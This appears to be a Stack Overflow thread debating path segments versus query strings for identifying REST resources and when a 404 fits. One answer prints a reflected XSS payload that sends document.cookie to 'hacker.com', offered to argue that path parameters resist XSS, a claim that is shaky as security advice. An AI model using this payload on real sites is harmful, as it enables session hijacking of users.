79

I had a discussion with a colleague today around using query strings in REST URLs. Take these 2 examples:

1. http://localhost/findbyproductcode/4xxheua
2. http://localhost/findbyproductcode?productcode=4xxheua

My stance was the URLs should be designed as in example 1. This is cleaner and what I think is correct within REST. In my eyes you would be completely correct to return a 404 error from example 1 if the product code did not exist whereas with example 2 returning a 404 would be wrong as the page should exist. His stance was it didn't really matter and that they both do the same thing.

As neither of us were able to find concrete evidence (admittedly my search was not extensive) I would like to know other people's opinions on this.

Luke Girvin
  • 13,221
  • 9
  • 64
  • 84
pythonandchips
  • 2,175
  • 2
  • 25
  • 28
  • Thanks for all the answers folk. He has now conceded to the view that option one is better than option 2 with some more reading/research. – pythonandchips Oct 01 '10 at 12:48
  • 32
    Note that resources in REST should be nouns and not verbs. "Find by product code" is therefore inappropriate in the first place. – fletom Jul 18 '13 at 07:27

10 Answers10

90

There is no difference between the two URIs from the perspective of the client. URIs are opaque to the client. Use whichever maps more cleanly into your server side infrastructure.

As far as REST is concerned there is absolutely no difference. I believe the reason why so many people do believe that it is only the path component that identifies the resource is because of the following line in RFC 2396

The query component is a string of information to be interpreted by the resource.

This line was later changed in RFC 3986 to be:

The query component contains non-hierarchical data that, along with data in the path component (Section 3.3), serves to identify a resource

IMHO this means both query string and path segment are functionally equivalent when it comes to identifying a resource.


Update to address Steve's comment.

Forgive me if I object to the adjective "cleaner". It is just way too subjective. You do have a point though that I missed a significant part of the question.

I think the answer to whether to return 404 depends on what the resource is that is being retrieved. Is it a representation of a search result, or is it a representation of a product? To know this you really need to look at the link relation that led us to the URL.

If the URL is supposed to return a Product representation then a 404 should be returned if the code does not exist. If the URL returns a search result then it shouldn't return a 404.

The end result is that what the URL looks like is not the determining factor. Having said that, it is convention that query strings are used to return search results so it is more intuitive to use that style of URL when you don't want to return 404s.

wprl
  • 24,489
  • 11
  • 55
  • 70
Darrel Miller
  • 139,164
  • 32
  • 194
  • 243
  • 13
    Quoting the RFC spec is fine but that's not exactly the question being asked. Yes, the two examples are functionally equivalent - that is not in dispute. The question goes beyond the textbook "definition" of a resource (for which they both apply). To his question, what to happen if code in query string isn't there? 404? What about the "cleaner" aspect of his question? Both are "valid", yes, but IMHO, #1 is "cleaner" and more in line with what he is seeking (in conjunction with my answer below with StackOverflow). – Steve Michelotti Sep 29 '10 at 21:47
  • 5
    I agree with the comparison you gave in your updated answer. query string makes sense for a search result with no 404s. For a product code (as per this question) 404 makes sense and IMO it's more common to not use query string for this scenario. Thanks for the updated answer. – Steve Michelotti Sep 30 '10 at 01:05
  • @DarrelMiller what do you mean by "IMHO this means both query string and path segment are functionally equivalent when it comes to identifying a resource."? Are you saying that http://foo/resources and http://foo/resources?queryParam=bar are to bee seen as the same resource identifiers? Or that, although different resource identifiers, they identify the same resource? – Les Hazlewood Dec 29 '11 at 21:34
  • 1
    @LesHazlewood Neither. They are two different resource identifiers that identify two different resources but either one would work just as effectively. – Darrel Miller Dec 29 '11 at 21:45
51

In typical REST API's, example #1 is more correct. Resources are represented as URI and #1 does that more. Returning a 404 when the product code is not found is absolutely the correct behavior. Having said that, I would modify #1 slightly to be a little more expressive like this:

http://localhost/products/code/4xheaua

Look at other well-designed REST APIs - for example, look at StackOverflow. You have:

stackoverflow.com/questions
stackoverflow.com/questions/tagged/rest
stackoverflow.com/questions/3821663

These are all different ways of getting at "questions".

Miika L.
  • 3,333
  • 1
  • 24
  • 35
Steve Michelotti
  • 5,223
  • 1
  • 25
  • 30
  • 11
    +1 because findbyproductcode is more verb than noun - its an RPC call, not a resource. However, I think the question changes a bit, and the answer too, when you have more than one search criteria instead of just product code. /products?size={size}&color={color} . I'd be interested in your thoughts on that. – ScottCher May 03 '12 at 13:16
  • 37
    I'd say: if *code*, `4xheaua`, is **the** product ID then I'd better go with `domain/products/4xheaua`. Instead, if *code* is just one of many search criteria, then I'd go with `domain/products?code=4xheaua`. – superjos Apr 17 '13 at 13:20
  • 1
    I'll add that extra path parts should express a hierarchical, directory-like relationship. This, I believe, is the underlying principle of what @superjos (+1) said. But, not all resources have IDs, so it's a little more general. – wprl May 17 '14 at 03:07
  • This is correct. This enables you to do things like http://localhost/products/new/ or http://localhost/products/firesale – richard Aug 06 '14 at 16:41
  • what about the resource is identified by 2 fields? /domain/projects?code=xxx&name=xxx – PeiSong Apr 17 '19 at 12:07
13

There are two use cases for GET

  1. Get a uniquely identified resource
  2. Search for resource(s) based on given criteria

Use Case 1 Example:

/products/4xxheua
Get a uniquely identified product, returns 404 if not found.

Use Case 2 Example:

/products?size=large&color=red
Search for a product, returns list of matching products (0 to many).

If we look at say the Google Maps API we can see they use a query string for search.

e.g. http://maps.googleapis.com/maps/api/geocode/json?address=los+angeles,+ca&sensor=false

So both styles are valid for their own use cases.

Michael Brown
  • 171
  • 1
  • 5
4

The way I think of it, URI path defines the resource, while optional querystrings supply user-defined information. So

https://domain.com/products/42

identifies a particular product while

https://domain.com/products?price=under+5

might search for products under $5.

I disagree with those who said using querystrings to identify a resource is consistent with REST. Big part of REST is creating an API that imitates a static hierarchical file system (without literally needing such a system on the backend)--this makes for intuitive, semantic resource identifiers. Querystrings break this hierarchy. For example watches are an accessory that have accessories. In the REST style it's pretty clear what

 https://domain.com/accessories/watches

and

https://domain.com/watches/accessories

each refer to. With querystrings,

 https://domain.com?product=watches&category=accessories

is not not very clear.

At the very least, the REST style is better than querystrings because it requires roughly half as much information since strong-ordering of parameters allows us to ditch the parameter names.

Matthew
  • 4,149
  • 2
  • 26
  • 53
  • 1
    Brilliant answer. I fully agree. I'd just add that query strings should still be used in 3 situations: (i) Pagination. Example: domain.com/accessories/watches?page=1 (ii) Filtering attributes: domain.com/accessories/watches?fields=maker,model,price (iii) Search criteria: domain.com/accessories/watches?price=LE+100 – Paulo Merson Nov 04 '15 at 13:51
4

IMO the path component should always state what you want to retrieve. An URL like http://localhost/findbyproductcode does only say I want to retrieve something by product code, but what exactly?

So you retrieve contacts with http://localhost/contacts and users with http://localhost/users. The query string is only used for retrieving a subset of such a list based on resource attributes. The only exception to this is when this subset is reduced to one record based on the primary key, then you use something like http://localhost/contact/[primary_key].

That's my approach, your mileage may vary :)

Sfynx
  • 365
  • 2
  • 4
3

This question is deticated to, what is the cleaner approach. But I want to focus on a different aspect, called security. As I started working intensively on application security I found out that a reflected XSS attack can be successfully prevented by using PathParams (appraoch 1) instead of QueryParams (approach 2).

(Of course, the prerequisite of a reflected XSS attack is that the malicious user input gets reflected back within the html source to the client. Unfortunately some application will do that, and this is why PathParams may prevent XSS attacks)

The reason why this works is that the XSS payload in combination with PathParams will result in an unknown, undefined URL path due to the slashes within the payload itself.

http://victim.com/findbyproductcode/<script>location.href='http://hacker.com?sessionToken='+document.cookie;</script>**

Whereas this attack will be successful by using a QueryParam!

http://localhost/findbyproductcode?productcode=<script>location.href='http://hacker.com?sessionToken='+document.cookie;</script>
My-Name-Is
  • 4,814
  • 10
  • 44
  • 84
3

The ending of those two URIs is not very significant RESTfully.

However, the 'findbyproductcode' portion could certainly be more restful. Why not just http://localhost/product/4xxheau ?

In my limited experience, if you have a unique identifier then it would look clean to construct the URI like .../product/{id} However, if product code is not unique, then I might design it more like #2.

However, as Darrel has observed, the client should not care what the URI looks like.

pc1oad1etter
  • 8,549
  • 10
  • 49
  • 64
  • +1 for "if product code is not unique". It would be somewhat counterintuitive to write e.g. `http://www.google.com/search/democracy` instead of `http://www.google.com/search?q=democracy`... or is it just our habit? – Sergey Orshanskiy Oct 08 '13 at 20:36
2

The query string is unavoidable in many practical senses.... Consider what would happen if the search allowed multiple (optional) fields to all ve specified. In the first form, their positions in the hierarchy would have to be fixed and padded...

Imagine coding a general SQL "where clause" in that format....However as a query string, it is quite simple.

David V. Corbin
  • 344
  • 1
  • 10
2

By the REST client the URI structure does not matter, because it follows links annotated with semantics, and never parses the URI.

By the developer who writes the routing logic and the link generation logic, and probably want to understand log by checking the URLs the URI structure does matter. By REST we map URIs to resources and not to operations - Fielding dissertation / uniform interface / identification of resources.

So both URI structures are probably flawed, because they contain verbs in their current format.

1. /findbyproductcode/4xxheua
2. /findbyproductcode?productcode=4xxheua

You can remove find from the URIs this way:

1. /products/code:4xxheua
2. /products?code="4xxheua"

From a REST perspective it does not matter which one you choose.

You can define your own naming convention, for example: "by reducing the collection to a single resource using an unique identifier, the unique identifier must be always part of the path and not the query". This is just the same what the URI standard states: the path is hierarchical, the query is non-hierarchical. So I would use /products/code:4xxheua.

inf3rno
  • 24,976
  • 11
  • 115
  • 197
1

Philosophically speaking, pages do not "exist". When you put books or papers on your bookshelf, they stay there. They have some separate existence on that shelf. However, a page exists only so long as it is hosted on some computer that is turned on and able to provide it on demand. The page can, of course, be always generated on the fly, so it doesn't need to have any special existence prior to your request.

Now think about it from the point of view of the server. Let's assume it is, say, properly configured Apache --- not a one-line python server just mapping all requests to the file system. Then the particular path specified in the URL may have nothing to do with the location of a particular file in the filesystem. So, once again, a page does not "exist" in any clear sense. Perhaps you request http://some.url/products/intel.html, and you get a page; then you request http://some.url/products/bigmac.html, and you see nothing. It doesn't mean that there is one file but not the other. You may not have permissions to access the other file, so the server returns 404, or perhaps bigmac.html was to be served from a remote Mc'Donalds server, which is temporarily down.

What I am trying to explain is, 404 is just a number. There is nothing special about it: it could have been 40404 or -2349.23847, we've just agreed to use 404. It means that the server is there, it communicates with you, it probably understood what you wanted, and it has nothing to give back to you. If you think it is appropriate to return 404 for http://some.url/products/bigmac.html when the server decides not to serve the file for whatever reason, then you might as well agree to return 404 for http://some.url/products?id=bigmac.

Now, if you want to be helpful for users with a browser who are trying to manually edit the URL, you might redirect them to a page with the list of all products and some search capabilities instead of just giving them a 404 --- or you can give a 404 as a code and a link to all products. But then, you can do the same thing with http://some.url/products/bigmac.html: automatically redirect to a page with all products.

Sergey Orshanskiy
  • 6,794
  • 1
  • 46
  • 50